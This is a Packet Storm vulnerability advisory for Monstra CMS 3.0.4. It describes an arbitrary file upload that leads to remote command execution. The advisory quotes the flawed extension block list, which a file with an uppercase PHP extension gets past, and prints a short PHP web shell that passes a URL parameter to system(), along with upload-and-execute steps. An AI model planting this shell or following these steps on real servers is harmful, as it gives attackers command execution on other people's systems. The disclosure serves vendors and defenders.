Monstra CMS 3.0.4 Remote Shell Upload

2017-12-17T00:00:00
ID PACKETSTORM:145451
Type packetstorm
Reporter Ishaq Mohammed
Modified 2017-12-17T00:00:00

Description

                                        
                                            `Exploit Title: Monstra CMS - 3.0.4 RCE  
Vendor Homepage: http://monstra.org/  
Software Link:  
https://bitbucket.org/Awilum/monstra/downloads/monstra-3.0.4.zip  
Discovered by: Ishaq Mohammed  
Contact: https://twitter.com/security_prince  
Website: https://about.me/security-prince  
Category: webapps  
Platform: PHP  
Advisory Link: https://blogs.securiteam.com/index.php/archives/3559  
  
Description:  
  
MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to a  
remote command execution on the remote server.  
  
Vulnerable Code:  
  
https://github.com/monstra-cms/monstra/blob/dev/plugins/box/filesmanager/filesmanager.admin.php  
line 19:  
  
public static function main()  
{  
// Array of forbidden types  
$forbidden_types = array('html', 'htm', 'js', 'jsb', 'mhtml', 'mht',  
'php', 'phtml', 'php3', 'php4', 'php5',  
'phps',  
'shtml', 'jhtml', 'pl', 'py', 'cgi', 'sh',  
'ksh', 'bsh', 'c', 'htaccess', 'htpasswd',  
'exe', 'scr', 'dll', 'msi', 'vbs', 'bat',  
'com', 'pif', 'cmd', 'vxd', 'cpl', 'empty');  
  
Proof of Concept  
Steps to Reproduce:  
  
1. Login with a valid credentials of an Editor  
2. Select Files option from the Dropdown menu of Content  
3. Upload a file with PHP (uppercase)extension containing the below code:  
  
<?php  
  
$cmd=$_GET['cmd'];  
  
system($cmd);  
  
?>  
  
4. Click on Upload  
5. Once the file is uploaded Click on the uploaded file and add ?cmd= to  
the URL followed by a system command such as whoami,time,date etc.  
  
  
Recommended Patch:  
We were not able to get the vendor to respond in any way, the software  
appears to have been left abandoned without support a though this is not an  
official status on their site (last official patch was released on  
2012-11-29), the github appears a bit more active (last commit from 2 years  
ago).  
  
The patch that addresses this bug is available here:  
https://github.com/monstra-cms/monstra/issues/426  
  
--   
Best Regards,  
Ishaq Mohammed  
https://about.me/security-prince  
`